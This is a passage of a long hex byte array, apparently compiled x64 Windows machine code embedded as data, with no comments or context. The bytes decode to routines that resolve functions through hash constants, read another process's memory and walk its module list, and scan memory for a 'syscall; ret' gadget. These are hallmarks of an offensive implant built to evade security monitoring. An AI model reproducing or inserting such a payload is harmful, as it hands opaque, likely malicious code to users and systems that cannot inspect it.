45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x3B,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x10,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x4C,0x8B,0x4D,0xE0,0x49,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x44,0x00,0x00,0x00,0x41,0xFF,0xD1,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x15,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xD8,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA8,0x5D,0x00,0x00,0x48,0x8B,0x05,0x99,0xFF,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x99,0xFF,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x2A,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x1E,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8C,0xFF,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x68,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x3F,0x84,0x00,0x00,0x48,0x89,0xC1,0xE8,0x86,0xD6,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x4F,0xB3,0x89,0x2E,0x48,0x89,0xC1,0xE8,0x94,0xD4,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x48,0x8D,0x55,0xE8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7F,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3F,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x55,0x18,0x4C,0x8B,0x45,0xF8,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xF4,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE1,0xFE,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xC0,0xBA,0x08,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x59,0x13,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x76,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x55,0xE8,0x48,0x89,0xC1,0xE8,0xEF,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xD3,0x12,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x42,0x48,0x8B,0x45,0xE8,0x48,0x8D,0x15,0xB1,0x83,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA3,0xFE,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x10,0x89,0x10,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x0D,0xFE,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xB3,0x82,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFA,0xD4,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x4F,0xB3,0x89,0x2E,0x48,0x89,0xC1,0xE8,0x08,0xD3,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x57,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x10,0x4C,0x8B,0x45,0xF0,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x3F,0x48,0x8D,0x55,0xD8,0x48,0x8B,0x45,0x18,0x4C,0x8B,0x45,0xF0,0x48,0x89,0xC1,0x41,0xFF,0xD0,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x74,0x27,0x48,0x8B,0x55,0xD8,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0x48,0x8B,0x05,0xCF,0xFD,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xFC,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0xE0,0x48,0x89,0xC1,0x48,0x8B,0x05,0x2A,0xFD,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x10,0x48,0x8B,0x45,0xD8,0x48,0x89,0xC1,0x48,0x8B,0x05,0x11,0xFD,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xEC,0x08,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF4,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF4,0x8B,0x45,0xEC,0x89,0xC3,0x48,0x8B,0x05,0x94,0xFC,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x90,0xFC,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF7,0x00,0x00,0x00,0x44,0x8B,0x45,0xEC,0x48,0x8B,0x4D,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xEC,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x0B,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCA,0x16,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x56,0x48,0x83,0x7D,0xF8,0x00,0x74,0x40,0x8B,0x55,0xF4,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x22,0x5A,0x00,0x00,0x48,0x8B,0x05,0x13,0xFC,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x13,0xFC,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x81,0x7D,0xF0,0x23,0x00,0x00,0xC0,0x0F,0x84,0x3E,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x62,0x48,0x8B,0x45,0xF8,0x8B,0x00,0x85,0xC0,0x0F,0x94,0xC0,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x28,0x89,0x10,0x48,0x83,0x7D,0xF8,0x00,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA8,0x59,0x00,0x00,0x48,0x8B,0x05,0x99,0xFB,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x99,0xFB,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x57,0x53,0x48,0x81,0xEC,0x70,0x04,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x10,0x04,0x00,0x00,0x48,0x89,0x95,0x18,0x04,0x00,0x00,0xC7,0x85,0xEC,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xD0,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xE8,0x03,0x00,0x00,0x00,0x01,0x00,0x00,0x48,0x8D,0x95,0xD0,0x01,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x55,0xD0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x40,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x8B,0x85,0xE8,0x03,0x00,0x00,0x89,0x45,0xCC,0x8B,0x85,0xE8,0x03,0x00,0x00,0x89,0x45,0xC8,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x09,0x80,0x00,0x00,0x48,0x89,0xC1,0xE8,0x50,0xD2,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x2B,0x75,0x3E,0x09,0x48,0x89,0xC1,0xE8,0x5E,0xD0,0xFF,0xFF,0x48,0x89,0x85,0xE0,0x03,0x00,0x00,0x48,0x83,0xBD,0xE0,0x03,0x00,0x00,0x00,0x0F,0x84,0x50,0x01,0x00,0x00,0x48,0x8D,0x95,0xD0,0x03,0x00,0x00,0x48,0x8B,0x85,0x10,0x04,0x00,0x00,0x48,0x89,0xC1,0xE8,0x40,0xF9,0xFF,0xFF,0x89,0x85,0xDC,0x03,0x00,0x00,0x83,0xBD,0xDC,0x03,0x00,0x00,0x00,0x0F,0x84,0x2A,0x01,0x00,0x00,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x4C,0x8D,0x45,0xCC,0x48,0x8D,0x8D,0xD0,0x01,0x00,0x00,0x48,0x8D,0x55,0xC4,0x48,0x89,0x54,0x24,0x30,0x48,0x8D,0x55,0xC8,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x55,0xD0,0x48,0x89,0x54,0x24,0x20,0x4C,0x8B,0x95,0xE0,0x03,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0x41,0xFF,0xD2,0x89,0x85,0xDC,0x03,0x00,0x00,0x83,0xBD,0xDC,0x03,0x00,0x00,0x00,0x0F,0x84,0xD5,0x00,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC0,0x48,0x8D,0x1C,0x00,0x48,0x8B,0x05,0x1A,0xFA,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x16,0xFA,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x95,0x18,0x04,0x00,0x00,0x48,0x89,0x02,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x0F,0x84,0x8D,0x00,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC1,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x29,0x58,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC2,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x49,0x89,0xD0,0x48,0x8D,0x15,0xBC,0x7F,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF8,0x57,0x00,0x00,0x8B,0x85,0xE8,0x03,0x00,0x00,0x01,0xC0,0x83,0xC0,0x01,0x89,0xC1,0x48,0x8B,0x85,0x18,0x04,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x95,0xD0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xCF,0x57,0x00,0x00,0xC7,0x85,0xEC,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x48,0x85,0xC0,0x74,0x13,0x48,0x8B,0x85,0xD0,0x03,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x74,0xF9,0x00,0x00,0xFF,0xD0,0x8B,0x85,0xEC,0x03,0x00,0x00,0x48,0x81,0xC4,0x70,0x04,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x37,0x0E,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xC8,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7B,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x00,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x18,0x48,0x89,0x45,0xF0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD8,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xAB,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x10,0x83,0x7D,0x18,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAD,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x79,0x59,0x83,0x7D,0x18,0x00,0x74,0x53,0x81,0x7D,0xEC,0x22,0x00,0x00,0xC0,0x75,0x20,0x48,0x8D,0x05,0x37,0x7E,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAF,0xAC,0xFF,0xFF,0x48,0x8D,0x05,0x5B,0x7E,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA0,0xAC,0xFF,0xFF,0xEB,0x23,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8D,0x05,0x4A,0x7E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0xAC,0xFF,0xFF,0x48,0x8D,0x05,0x36,0x7E,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7B,0xAC,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD0,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF9,0x0B,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD0,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x05,0x69,0xF7,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x20,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x62,0xF7,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAC,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0x18,0x8B,0x50,0x40,0x48,0x8B,0x45,0xF8,0x89,0x50,0x10,0x48,0x8B,0x45,0x18,0x8B,0x90,0x80,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x18,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x8B,0x90,0x20,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x1C,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x40,0x48,0xBA,0x00,0x02,0x00,0x00,0x66,0x39,0xD0,0x0F,0x47,0xC2,0x0F,0xB7,0xC0,0x89,0x45,0xF4,0x8B,0x4D,0xF4,0x48,0x8B,0x45,0xF8,0x4C,0x8D,0x40,0x14,0x48,0x8B,0x45,0x18,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x48,0x89,0xC1,0xE8,0x02,0x0B,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x28,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xAA,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x48,0x8B,0x45,0x28,0x41,0xB8,0x04,0x01,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0x54,0x00,0x00,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x40,0x58,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x60,0x48,0x8B,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x50,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x81,0xEC,0xA0,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x30,0x03,0x00,0x00,0x48,0x89,0x95,0x38,0x03,0x00,0x00,0x44,0x89,0x85,0x40,0x03,0x00,0x00,0x44,0x89,0x8D,0x48,0x03,0x00,0x00,0x48,0xC7,0x85,0x18,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x95,0x48,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD4,0xFC,0xFF,0xFF,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x83,0xBD,0x10,0x03,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x27,0x02,0x00,0x00,0x48,0xC7,0x85,0x08,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0xC7,0x85,0x06,0x03,0x00,0x00,0x00,0x00,0xC7,0x85,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xB0,0x01,0x00,0x00,0x4C,0x8D,0x45,0xA0,0x48,0x8D,0x8D,0xB0,0x01,0x00,0x00,0x48,0x8B,0x95,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9C,0xFE,0xFF,0xFF,0x89,0x85,0xEC,0x02,0x00,0x00,0x83,0xBD,0xEC,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC4,0x01,0x00,0x00,0x48,0x83,0xBD,0x08,0x03,0x00,0x00,0x00,0x75,0x0E,0x48,0x8B,0x85,0xB8,0x01,0x00,0x00,0x48,0x89,0x85,0x08,0x03,0x00,0x00,0xC7,0x85,0xFC,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x19,0x01,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x55,0xA0,0x48,0x89,0xC1,0x48,0x8B,0x05,0x6A,0xF5,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xDD,0x00,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0x08,0x7B,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x32,0xF5,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0A,0xC7,0x85,0x00,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDC,0xFC,0xFF,0xFF,0x48,0x89,0x85,0xE0,0x02,0x00,0x00,0x48,0x83,0xBD,0xE0,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF9,0x00,0x00,0x00,0x48,0x83,0xBD,0x18,0x03,0x00,0x00,0x00,0x75,0x10,0x48,0x8B,0x85,0xE0,0x02,0x00,0x00,0x48,0x89,0x85,0x18,0x03,0x00,0x00,0xEB,0x41,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0xEB,0x11,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE0,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x95,0xE0,0x02,0x00,0x00,0x48,0x89,0x10,0x0F,0xB7,0x85,0x06,0x03,0x00,0x00,0x83,0xC0,0x01,0x66,0x89,0x85,0x06,0x03,0x00,0x00,0xEB,0x19,0x83,0x85,0xFC,0x02,0x00,0x00,0x01,0x8B,0x85,0xFC,0x02,0x00,0x00,0x3B,0x85,0x40,0x03,0x00,0x00,0x0F,0x8C,0xD5,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x10,0x03,0x00,0x00,0x48,0x3B,0x85,0x08,0x03,0x00,0x00,0x74,0x15,0x0F,0xBF,0x85,0x06,0x03,0x00,0x00,0x39,0x85,0x40,0x03,0x00,0x00,0x0F,0x8F,0x3D,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0xBD,0x48,0x03,0x00,0x00,0x00,0x74,0x2E,0x83,0xBD,0x00,0x03,0x00,0x00,0x00,0x75,0x25,0x48,0x8D,0x05,0x05,0x7A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x05,0xA8,0xFF,0xFF,0x48,0x8D,0x05,0xB1,0x79,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF6,0xA7,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x07,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x81,0xC4,0xA0,0x03,0x00,0x00,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0xAD,0xDE,0xDE,0xC0,0xC3,0x90,0x0F,0x0B,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xB9,0x0F,0x2A,0x9B,0xCD,0xE8,0x3F,0x06,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xE1,0x0F,0x05,0xC6,0x45,0xE3,0xC3,0x8B,0x45,0x18,0x83,0xE8,0x02,0x89,0x45,0xE4,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB0,0x50,0x00,0x00,0x85,0xC0,0x75,0x09,0x48,0x8B,0x45,0xE8,0xE9,0xD1,0x00,0x00,0x00,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0xE4,0x72,0xC3,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0xC7,0